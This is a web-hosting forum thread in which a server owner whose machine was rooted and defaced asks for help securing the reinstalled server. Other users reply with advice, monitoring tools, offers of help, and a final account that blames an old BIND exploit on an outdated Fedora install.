sphost

Well-Known Member
Jan 19, 2004
59
0
156
My server is hacked by backd00red , they gained access to the server and changed rot password, they defaced most site on the server!
how can they access the root? i have a very strong password.

my question, how do i secure the server now after it is reinstalled?

thanks

Tom
 

wonker

Active Member
Dec 5, 2007
32
5
58
Maybe with the latest openssh exploit that is rumoured all over the web ?
 

eth00

Well-Known Member
PartnerNOC
Mar 30, 2003
721
1
168
NC
cPanel Access Level
Root Administrator
Was everything updated, do you run the latest kernel on your machine? Did you do anything towards security on your server or did you let it do its own thing after you ordered it?
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
Was everything updated, do you run the latest kernel on your machine? Did you do anything towards security on your server or did you let it do its own thing after you ordered it?
just left it as is !!
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
is there is any reliable company out there that offer server securing service?
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
My server is hacked by backd00red , they gained access to the server and changed rot password, they defaced most site on the server!
how can they access the root? i have a very strong password.
my question, how do i secure the server now after it is reinstalled?
is there is any reliable company out there that offer server securing service?
I will be glad to take a look and help you clean up the mess and secure your server. Contact me!

I have more than 30 years field experience in network and server security, written
many network security books, teach on the subject, and own several computer security
consulting firms with clients around the globe so I am definitely in a position to help
you recover and can show you a lot of things you maybe didn't think about originally
that may or may not of led to the current breach. The bigger question is if you
fully grasp the extent of your current situation you just described? There is also a
very good chance that whoever got into your server also installed backdoors for
themselves to regain access again at a later date and that will also need to be
determined and closed out in addition to hardening the security on your server.

Don't worry about any money at the moment, I am more concerned with
stopping attacks like these and I am only glad to help and can give you a
very big helping hand working through this issue. We need to get your server
back to a safe state and get you much better security so you don't have to
go through this again. I am most concerned that you may have far more issues
than you are aware (or even begin to grasp at the current moment) since I have
dealt with the clean up of thousands of these sort of attacks. I would almost
guarantee your server now has a huge number of backdoors and other security
compromises already in place to be concerned about above and beyond the
original path of exploit and that is what I would be most concerned about first.
If these issues are not handled properly right now, you are just going to run
into the same situation again or far worse. Once that is addressed then the
fun task of cleanup can press forward and then server security hardening so
that this becomes an isolated incident that doesn't repeat for you.

I will be on for another few hours and keep an eye on private messages
if you want to reach me. I'll also send you a message how to reach me.

EDIT: Regarding italics above. I'm going offline now but will be back tomorrow
 
Last edited:

Spiral

BANNED
Jun 24, 2005
2,020
8
193
JPetersen:

I would love to answer your questions but the last time it slipped
publicly my identity online, that was a huge mistake and I am very
careful now what I let slip and choose my words very carefully and
very deliberately for good reason. Don't think I am blowing you off
because I am here and now giving you a thoughtful personal answer.

Someone I helped a few years ago and later flew up to meet me
posted my identity the next week and I got rushed with thousands of
"help me", "can I hire you", and "how do you security this or that" and
general fan lore questions which to be honest was a bit overwhelming.
I would prefer not to get into all that all over again so I am sure you
can respect my interest in privacy.

If you are really that curious though, it is not exactly rocket science to
figure out who I am just on what side facts you already know about me
and my writings and posts in this and dozens of other forums but I would
prefer you leave that to your own quiet speculation. Many thanks. :cool:

Anyway, to your larger and unspoken question ...

I am here first and foremost because I enjoy helping people and I do what
I can to help those who really need help concentrating the most on
those people I feel need the help the most. Most of these people would
not be able to afford hiring anyone at my level so they have really nowhere
to turn other than to scout online help forums (like this one and dozens
of other similar forum communities) out there.

I have a different name in every forum community but you can be sure
that I monitor a great many of them as these are the place you find people
with the most questions and in the most need and I help people where I can.

If you doubt any of that, just read all my posts here posted through the years.

sphost said:
My server is hacked by backd00red , they gained access to the server and changed rot password, they defaced most site on the server!
how can they access the root? i have a very strong password.

my question, how do i secure the server now after it is reinstalled?
Now in the case of sphost, he got hit with an unexpected attack per his post
above and clearly thought his security was "good enough" which it obvioiusly
wasn't and that is good enough for me. Under those conditions, I'll help anyone
that asks for my help assuming they can get my attention but I watch these
forums fairly close so it is not all that hard to do.

-Spiral

PS: Incidentally, for those who have a need to know, I do let them know,
and most of those people and the people I choose to help and there have
been many through the years, most I can now consider friends,
some very close friends.
 
Last edited:

jpetersen

Well-Known Member
Dec 31, 2006
113
4
168
JPetersen:

I would love to answer your questions but the last time it slipped
publicly my identity online, that was a huge mistake and I am very
careful now what I let slip and choose my words very carefully and
very deliberately for good reason. Don't think I am blowing you off
because I am here and now giving you a thoughtful personal answer.

Someone I helped a few years ago and later flew up to meet me
posted my identity the next week and I got rushed with thousands of
"help me", "can I hire you", and "how do you security this or that" and
general fan lore questions which to be honest was a bit overwhelming.
I would prefer not to get into all that all over again so I am sure you
can respect my interest in privacy.

If you are really that curious though, it is not exactly rocket science to
figure out who I am just on what side facts you already know about me
and my writings and posts in this and dozens of other forums but I would
prefer you leave that to your own quiet speculation. Many thanks. :cool:

Anyway, to your larger and unspoken question ...

I am here first and foremost because I enjoy helping people and I do what
I can to help those who really need help concentrating the most on
those people I feel need the help the most. Most of these people would
not be able to afford hiring anyone at my level so they have really nowhere
to turn other than to scout online help forums (like this one and dozens
of other similar forum communities) out there.

I have a different name in every forum community but you can be sure
that I monitor a great many of them as these are the place you find people
with the most questions and in the most need and I help people where I can.

If you doubt any of that, just read all my posts here posted through the years.


Now in the case of sphost, he got hit with an unexpected attack per his post
above and clearly thought his security was "good enough" which it obvioiusly
wasn't and that is good enough for me. Under those conditions, I'll help anyone
that asks for my help assuming they can get my attention but I watch these
forums fairly close so it is not all that hard to do.

-Spiral

PS: Incidentally, for those who have a need to know, I do let them know,
and most of those people and the people I choose to help and there have
been many through the years, most I can now consider friends,
some very close friends.
I do know who you are, and googling for "your name" (with quotes) and "author" does not return any results of books written by you. Please send me a PM with the names of the books you have authored, including ISBN. I promise I will not share this information with anyone, and I will not ask you to help me, or ask about hiring you, or ask about how to do anything that pertains to security. If your books sound interesting, I would purchase them instead so that you can be rewarded for your efforts.

Thanks.
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
sorry to bump into the thread once again, anyone knows.
As I told you, I'll help you with that! :rolleyes:

I can give you a long list of people and companies that can help you
but there is very few, if any, that could help you to the extent that
I can and I am not asking for any money either which is a plus for you.

Just to give you other options, chk's recommendation of asking Chirpy for
help isn't a bad idea and I have known Chirpy plenty long enough and I
have seen his work enough first hand to vouch for him. I also routinely
use his firewall script myself. PlatinumServerM, also around here, has
reasonable enough experience to help you with this issue and has his own
server management company as well. A friend of mine, Crosswinds, might
be able to help you. I don't know if he would take you on since his interests
lie elsewhere but crosswinds is one of the very few people I can talk to on
a peer level and that says a whole lot actually and I know he would have
the necessary skills to help you out and be able to rip through your server
and get you back where you need to be with real security added in the
process along the way. These are the few people around here that I would
personally trust outside myself. ;)

If you are feeling a bit paranoid or otherwise just wanting to do everything
yourself, that is fine. Talk to me and I'll still try to guide you through
the steps of where to go, what to look for, what to update, and what
you need to know to get your server fixed and heavily secured. If you
are lucky, maybe find out exactly how you were originally hacked if you
haven't already destroyed the evidence the hacker may have left behind.
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
I've used and recommend Chirpy. He's a moderator here, has well over 13,000 posts, and knows his stuff..
Thanks alot for your recommendation.

As I told you, I'll help you with that! :rolleyes:

I can give you a long list of people and companies that can help you
but there is very few, if any, that could help you to the extent that
I can and I am not asking for any money either which is a plus for you.
Spiral, i really appreciate your offer, thing is that server were formatted, and my DC did a reinstall so what i am basically looking for is someone to secure my server not to restore it.

as for your free offer, i do appreciate it as well, but i prefer to pay for what i get. while IT IS so kind of you, still i really cant accept that. however, if you are seriouse about helping me to do it myself, this will make me learn a lot, i recommend that you post a SECURE YOUR SERVER type of thread in public so other people benefit from it as well, like this thread which is very usefull but unfortunatly i did all what is mentioned there but my server got hacked so looks like there is a lot more to be done.
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
Spiral, i really appreciate your offer, thing is that server were formatted, and my DC did a reinstall so what i am basically looking for is someone to secure my server not to restore it.
That would be my primary professional specialty! :D

I could help you diagnose the issue and track down the source of the
original attack but if you already reloaded the server, there is not much
use in that so yes the next step would be to secure the server and
I definitely can help you with that far beyond your wildest dreams.

Generally it is good to dig through things for forensic purposes before
blowing away the server but since you've already jumped ahead,
not much can be done other than to press forward with getting
you re-setup again and secured so this doesn't happen again.

as for your free offer, i do appreciate it as well, but i prefer to pay for what i get. while IT IS so kind of you, still i really cant accept that. however, if you are serious about helping me to do it myself, this will make me learn a lot, i recommend that you post a SECURE YOUR SERVER type of thread in public so other people benefit from it as well, like this thread which is very usefull but unfortunatly i did all what is mentioned there but my server got hacked so looks like there is a lot more to be done.
There is absolutely a WHOLE LOT more to be done!

If you have read my posts here, you will see that I often address
many issues that are often overlooked. While the "secure your server"
type threads here and elsewhere are useful for the basics, they often
overlook many of the more important areas where you might be vulnerable
and the hackers out there aren't going to be so ignorant. The bigger
thing to know and understand is "how things work" and the reasons why
there are vulnerabilities. A hacker doesn't think about where you have
secured your server so much as what you may have missed.

Regarding posting a thread, I'm actually in the process of doing much
better than that. I have a new book that is coming out soon that
will have a CD that automatically secures everything for Linux servers
particularly those running Cpanel or Plesk. Once we get the bugs
worked out in that program and some of the licensing issues, I'm
considering posting a link to downloading it on here so that may
be coming along fairly soon.

Now regarding your mentioning "you did all", I would like to sit down
with you and discuss exactly everything you can remember you did
originally as that will give me some insight as to your original configuration,
the areas you may have missed, and where you more likely got hacked,
and also would tell me what areas I may need to bring you more up to
speed on and get you to strengthen your understanding.

Regarding your offer to pay, I won't recend my offer but I'll do it this way.
If you think my help to you is valuable, you can go ahead and pay me
what you think it is worth to you. Fair enough?

I'll be offline for the next hour or so as there is a place I need to be
but I'll be online most of this evening if you want to try to catch up
to me. I left you a message yesterday with my contact info so that
you can reach me outside of the private messages here.
 

sphost

Well-Known Member
Jan 19, 2004
59
0
156
Now regarding your mentioning "you did all", I would like to sit down
with you and discuss exactly everything you can remember you did
originally as that will give me some insight as to your original configuration,
the areas you may have missed, and where you more likely got hacked,
and also would tell me what areas I may need to bring you more up to
speed on and get you to strengthen your understanding.

this was basically what i did http://forums.cpanel.net/f7/beginners-guide-securing-your-server-30159.html
 

ddmd

Registered
Jul 11, 2009
3
0
51
Maybe they did not found your root password, but another user pass and exploited some local vulnerability to get root?

Did you check your logs to see if they brute forced it? As far as monitoring, this is what I just posted on another thread:

I had a similar problem a while ago and used the ossec tool (open source) to find all offending packages. It has a nice rootkit/worm/exploits detection tool in there....

After that, I kept that running with Snort and modsecurity (all open source) to monitor my systems. I lately also found sucuri to remotely check if my sites have been defaced, blacklisted, etc.

links:
Welcome to the Home of OSSEC
ModSecurity: Open Source Web Application Firewall
Snort :: Home Page
Sucuri information security (BETA)
 

Spiral

BANNED
Jun 24, 2005
2,020
8
193
Maybe they did not found your root password, but another user pass and exploited some local vulnerability to get root?
Sphost was (and still - unfortunately) using an obsolete almost EOL version
of Fedora and the BIND server had originally not been patched or secured
in the original server configuration and the hackers had used an old exploit
to gain a root shell via a DNS attack. It would not have worked on most
servers today so they were actually lucky finding his server.

His server has now been fully secured and the vulnerable areas have
been manually patched and reconfigured so the previous vulnerabilities
no longer exist, the server fully hardened, and an extensive list of
defensive technologies have been put in place to help protect him
from future exploit and hacking attempts.

He's in a lot better shape now and has also been upgraded in the process
to Apache 2.2.11 along with SuHosin hardened SuPHP and other goodies
including well configured firewall and port scan monitors, root kit detectors,
intelligent traffic monitoring, self updating protection, and other fun stuff.